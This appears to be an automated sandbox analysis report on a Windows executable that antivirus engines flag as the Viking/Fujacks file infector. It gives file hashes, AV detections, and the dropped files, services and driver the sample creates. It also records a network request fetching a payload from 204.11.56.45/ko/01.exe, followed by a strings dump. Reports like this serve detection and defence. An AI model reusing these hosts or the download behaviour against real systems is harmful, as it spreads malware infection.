Analysis Date2015-01-27 01:54:04
MD537e89c260b3deebc30970b42bfa47c9e
SHA11f91b41c33c503a3ebefdb75da00bc9da91e4d74

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 03572dc8bff93c66b265a638b843b48f sha1: 2831ff5d3567dac2585e864a6ac6e75e49c3d59f size: 77824
Section.rdata md5: 99282cb2e19a879647fed1e10073c920 sha1: 63e4042c66e0e4097457a9f75495e2c61b416474 size: 8192
Section.data md5: b6f6064ca7f042e428ea420262837bf2 sha1: 5d7a7d29c8f334b249ffe90accc5a99b9f4fdb24 size: 8192
Section.rsrc md5: f29fc92e0c9161fc04c57fb665b7abb3 sha1: db64e1b87f3eefa1f70b7682f860d921be1c5481 size: 89600
Section.tc$ md5: b66895d29926164b0057a3dd48630b40 sha1: 2836c3c1de68c0c15897e04e8002b6c832cbe2f1 size: 28672
Timestamp2000-05-07 03:47:59
VersionLegalCopyright: Copyright c 2000
InternalName: mmvem
FileVersion: 1, 0, 0, 1
CompanyName: mmedia
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: mmedia mmvem
SpecialBuild:
ProductVersion: 1, 0, 0, 1
FileDescription: mmvem
OriginalFilename: mmvem.exe
PEhashca68ec860d0ae3325d7910187ef5abca4708fb80
IMPhashc873d79e4f0aec16ef153fe631f20302
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Crypt-RPT [Trj]
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.VB-35
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\294d_appcompat.txt
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 1332 -e 172 -g
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 216

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 216

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1332 -e 172 -g

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 800

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileNtHid
Creates FileC:\temp\files\Expor.exe
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0LM74DA3\desktop.ini
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0L2RGPMF\desktop.ini
Creates FileC:\temp\files\monitor.exe
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\2905UBK7\desktop.ini
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YDIURPLT\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1860

Process
↳ Pid 1136

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSnbtj.114anhui.com
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
040404b0
1, 0, 0, 1
Cancel
Comments
CompanyName
Copyright c 2000
EMAIL
FILE
FileDescription
FileVersion
         (((((                  H
InternalName
LegalCopyright
LegalTrademarks
Message:
mmedia
mmedia mmvem
mmvem
mmvem.exe
OriginalFilename
PrivateBuild
ProductName
ProductVersion
Return e-mail
Return email to:
SpecialBuild
StringFileInfo
System
Translation
VarFileInfo
VS_VERSION_INFO
 0+020e0k0
0,0A0^0s0
08101BB
0j/0@0E0R0f0
|$0SSVW
0SUVWh
0T0X0\0`0d0h0l0p0t0x0|
1=>=F=
:1G1P1]1
1K1Z1h1
1#QNAN
1#SNAN
?%?2?]?
2(2B2N2W2c2n
2<2Q{h2p2
2?3H3Q
2D2J2O2U2b1n2t2
>2>E>S>\>s>
2K2f2v2
2T2d2{2
3$30l3Xk
343=3B3j3p3|3
*37}Cg
        %3d %3d %3d %3d %3d %3d %3d %3d
;3D;H;L
@3T3e3
4&414]4
4%4+4G4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
        %4u %4u %4u %4u %4u %4u %4u %4u
5!6&6/6
)56Ab5t5
5a  7-Dec-94
;!;+;5;?;C;J;
:5:F:Y:w:|:
6.6:6C6M6W6\6
6<6]6i6
6!71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
>!>*>8>B>H>V>`>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e
-9;9A9F9
9ao^@q
'9A\u"9
9t$0v8
9.:U:p:}:
_9=x~A
A4J4Y4_4
A67-586
abnormal program termination
Adobe APP14 marker: version %d, flags 0x%04x 0x%04x, transform %d
ADVAPI32.dll
AE4C57'
agX \s
ALIGN_TYPE is wrong, please fix
a Play
Application transferred too few scanlines
Application transferred too many scanlines
appmgmts.dlld
At marker 0x%02x, recovery action %d
AVIFIL32.dll
AVIFileCreateStreamA
AVIFileOpenA
AVIFileRelease
AVI Files [*.avi]
AVIStreamRelease
AVIStreamSetFormat
AVIStreamWrite
Backing store not supported
"bd	WVS
BeginPaint
bgTLOkN
BitBlt
BKbhTb~XBK!;
Bogus buffer control mode
Bogus DAC index %d
Bogus DAC value 0x%x
Bogus DHT counts
Bogus DHT index %d
Bogus DQT index %d
Bogus input colorspace
Bogus JPEG colorspace
Bogus marker length
Bogus message code %d
Bogus sampling factors
Bogus virtual array access
browser
Buffer passed to JPEG library is too small
button
C1E870B0C
CallWindowProcA
CancelConne
 cannot be run i
Can not open %s
Cannot quantize more than %d color components
Cannot quantize to fewer than %d colors
Cannot quantize to more than %d colors
Caution: quantization tables are too coarse for baseline JPEG
CCIR601 sampling not implemented yet
Closed temporary file %s
CloseHandle
_Close_JPEG_Decompressor@0
comdlg32.dll
    Component %d: dc=%d ac=%d
    Component %d: %dhx%dv q=%d
CopyFileA
Copyright (C) 1994, Thomas G. Lane
Copyro
Corrupt JPEG data: bad Huffman code
Corrupt JPEG data: found marker 0x%02x instead of RST%d
Corrupt JPEG data: premature end of data segment
Corrupt JPEG data: %u extraneous bytes before marker 0x%02x
CP<Z<|<
CreateCompatibleDC
CreateDIBitmap
CreateFileA
CreateProcessA
CreateWindowExA
crypt'c
D$ _^][
D0H0L0PM
D$8QQWV
D$8SVW
D$8WRSVP
DA-6D69-472e-8981-DBC71
@.data
D$D_^[
D$(data
Ddk h$
D$DRPS
D$DWAVE
_Decompress_One_Line@4
default
Define Arithmetic Table 0x%02x: 0x%02x
Define Huffman Table 0x%02x
Define Quantization Table %d  precision %d
Define Restart Interval %u
DefWindowProcA
DeleteDC
DeleteFileA
DeleteObject
DestroyWindow
(D/fc_oL
D$(fmt 
D$hRPj
Didn't expect more than one scan
DispatchMessageA
D$(;l$ 
D$LCUSPW
DOMAIN error
DOS mode.
D$Pdata
D$Pfmt 
D$$RPS
D$$SUV
DSUVWh
dU5 B~
D$ UW3
&=,=D=v=
D$ WPj
D$<WPV
E8J8O8[8`8i8o8z8
E-Mail...
Empty input file
Empty JPEG image (DNL not supported)
EnableWindow
_End_JPEG_Decompress@0
End Of Image
EndPaint
english
ep1'*"/
eParam$
Esht*6
Executable
ExecuUA
ExitProcess
Expor.exe
F??3@YAXP
Failed to create temporary file %s
f+D?	D
FillRect
- floating point not loaded
Fractional sampling not implemented yet
Freed EMS handle %u
Freed XMS handle %u
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
~Fun Loving Criminal~
G@_^][
GAIsProcessorFeaturePresent
GD_^][
GDI32.dll
GetACP
GetActiveWindow
GetClassInfoA
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileAttributesA
GetFileSize
GetFileType
GetLastActivePopup
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetOEMCP
GetProcAddress
GetProfileIntA
GetSaveFileNameA
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSystemDefaultLangID
GetTempPathA
GetTickCount
GetVersion
GetWindowRect
GetWindowsDirectoryA
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
h1l1.T
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
High JPEG Data in Memory
Huffman code size table overflow
Huffman table 0x%02x was not defined
Hur3'$
IDCT output block size %d not supported
iD&YomH
ifyTrLo
igVCRT
Image too wide for this implementation
Improper call to JPEG library in state %d
InfGma
ingCompatibil
_Init_JPEG_Decompressor@4
Input file read error
Insufficient memory (case %d)
InvalidateRect
Invalid component ID %d in SOS
Invalid JPEG file structure: missing SOS marker
Invalid JPEG file structure: SOS before SOF
Invalid JPEG file structure: two SOF markers
Invalid JPEG file structure: two SOI markers
Invalid memory pool code %d
Invalid SOS parameters for sequential JPEG
IocSymd
IsWindowEnabled
i|tlh`
IXR-!m
_;i;z;
JFIF APP0 marker, density %dx%d  %d
JPEG datastream contains no image
j,RSPf
 -k 4/
kca:\lsa
KERNEL32
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
L$0SUV@W
L$4PQW
L5PFHP7b
LCMapStringA
LCMapStringW
L$DPQS
L$|h(cA
L$HWUPVQ
L$,j(QR
LoadCursorA
LoadIconA
LoadLibraryA
Low JPEG Data in Memory
lp6a J
L$pj,QV
L$(RQW
lstrcatA
lstrcmpiA
lstrcpyA
lstrlenA
L$,SUV
L$ UVRPj
m1\U\Kcn
MAPI32.DLL
MAPIAddress
MAPIDeleteMail
MAPIDetails
MAPIFindNext
MAPIFreeBuffer
MAPILogoff
MAPILogon
MAPIReadMail
MAPIResolveName
MAPISaveMail
MAPISendDocuments
MAPISendMail
MAX_ALLOC_CHUNK is wrong, please fix
Maximum supported image dimension is %u pixels
mciSendCommandA
MCIWndCreateA
M:d:m:
MessageBoxA
Meta Media Video E-Mail
MeXX Media BMP->JPG Compress
Microsoft Visual C++ Runtime Library
Missing Huffman code table entry
mmioAscend
mmioClose
mmioDescend
mmioOpenA
mmioRead
mmvem.exe
MM Video E-Mail
MM Video E-Mail\DefaultIcon
MM Video E-Mail\shell
MM Video E-Mail\shell\open
MM Video E-Mail\shell\open\command
MSN Gam
MSVCRT.dll
MSVFW32.dll
MultiByteToWideChar
NL_^][
Not a JPEG file: starts with 0x%02x 0x%02x
Not a valid exe file format
Not a valid file format. Or wrong version of player program.
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
Not implemented yet
 NT\Curr
NtQu9y
Nv`mG}
Obtained EMS handle %u
Obtained XMS handle %u
oft\Wud
o@P3e4
Op-;4$
~OPEN=-
Opened temporary file %s
+OpsSCM
|otB.8
Out of memory
Output file write error --- out of disk space?
,ov\A}
PathFileExistsA
 Please download the player program from http://www.mmedia.com.tw
PostMessageA
PostQuitMessage
Premature end of input file
Premature end of JPEG file
Print...
Program: 
<program name unknown>
- pure virtual function call
pVKwOf
pwwwwwwwwww
P;Z;d;n;x;
q$A3<.
qidu.com
QPSWVR
QQQQQQQ
Quantization table 0x%02x was not defined
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
\Ra7207
 `.rdat[
.rdata
Read failed on temporary file
ReadFile
Read from EMS failed
Read from XMS failed
RECYCLER
RegCloseKey
RegCreateKeyExA
RegisterClassA
RegisterClassExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
Remote
Requested feature was omitted at compile time
_rju@_fd
-<RoA%'_h7
RtlIoU
RtlUnwind
runtime error 
Runtime Error!
S1[1`1m1
Sampling factors too large for interleaved scan
%s Audio #1
Save...
{schedsvc
SDPSRV
Seek failed on temporary file
Selected %d colors for quantization
SelectObject
SendMessageA
Send the card for printing?
SetFilePointer
SetHandleCount
SetRect
SetWindowPos
SetWindowTextA
SHLWAPI.dll
ShowWindow
SING error
Skipping marker 0x%02x, length %u
%s\mmvem.exe
%s\mmvem.exe %%1
Smoothing not supported with nonstandard sampling ratios
SOFTWARE\Mi
Software\vp-eye
Sorry, there are legal restrictions on arithmetic coding
Sp`FFF
SS@SSPVSS
_Start_JPEG_Decompress@16
Start Of Frame 0x%02x: width=%u, height=%u, components=%d
Start of Image
Start Of Scan: %d components
SuperButton
Suspension not allowed here
SUVWjdP
s_/UYY
%s Video #1
SVWWWU
swsocknetman1ssdp
t4Ht"Ht
.tcLCI0
T$dRPU
teHt3H
tempxxxx.jpg
TerminateProcess
.textVT
_This #g
!This program cannot be run in DOS mode.
T$|hLcA
T$|hpcA
t-HueV
timeBeginPeriod
timeEndPeriod
timeKillEvent
timeSetEvent
T$ jtRV
TLOSS error
tl`TDi
tmp54321.jpg
tmp%5d.avi
tmp%5d.wav
ToFilnH
tooltips_class32
Too many color components: %d, max %d
tP8^@t
tP9t$0}
T$PQRP
T$$PRV
T$ QRU
TranslateMessage
T$@RSj
tSHt~H
t#SSUP
+ttHHtd
tTisrv
t.;t$$t(
t$$VSS
?%_#txg
T$XjdR
?u='@^
u]9B uX
>"u:F@
u.h bA
u.hPLA
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
- unexpected heap error
Unexpected marker 0x%02x
- unexpected multithread lock error
UnhandledExceptionFilter
Unknown Adobe color transform code %d
Unknown APP0 marker (not JFIF), length %u
Unknown APP14 marker (not Adobe), length %u
Unrecognized component IDs %d %d %d, assuming YCbCr
UnregisterClassA
Unsupported color conversion request
Unsupported JFIF revision number %d.%02d
Unsupported JPEG data precision %d
Unsupported JPEG process: SOF type 0x%02x
Unsupported marker type 0x%02x
UpdateWindow
#upnphostKn&s
uR9B\uM
URLDown
URPh bA
user32.dll
USER32.dll
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
VC20XC00U
v|htcL
Video Recorder self-executable
vieAak:m
VirtualAlloc
Virtual array controller messed up
VirtualFree
VirtualProtect
vThfad
\v:.X$
W0YX0wx
|w9=trW
Warning: thumbnail image size does not match data length %u
Warning: unknown JFIF revision number %d.%02d
waveaudio
WAVE Files [*.wav]
wavexxxx.wav
WideCharToMultiByte
WINMM.dll
 winsta0
    with %d x %d thumbnail image
WithTag	
WmdmPmSN'Fa
WO$_9E
wpwwwp
wpwwwwwwww
WQRPSV
Writea7
Write failed on temporary file --- out of disk space?
WriteFile
Write to EMS failed
Write to XMS failed
wsprintfA
wwpwwp
wwwwwwpwwp
wwwwwwwwpwp
wwwwwwwwwwpp
wwwwwwwwwwww
<	=x=}=
/X,.CC
 X -ibcB"
<)<.<X<i<o
xmlpbS
{+xN{?ODBE
XPTPSW
XPVSSG
XRichS
xwuLEwE
XX; tg
/;%y;~;
.y!GN&
|/Yr3Y
*y/.uzyzuEFz8GD
y%*+vp*vCpuC%
/YW'RB
_^][YY
YYh `A
@z}]u2o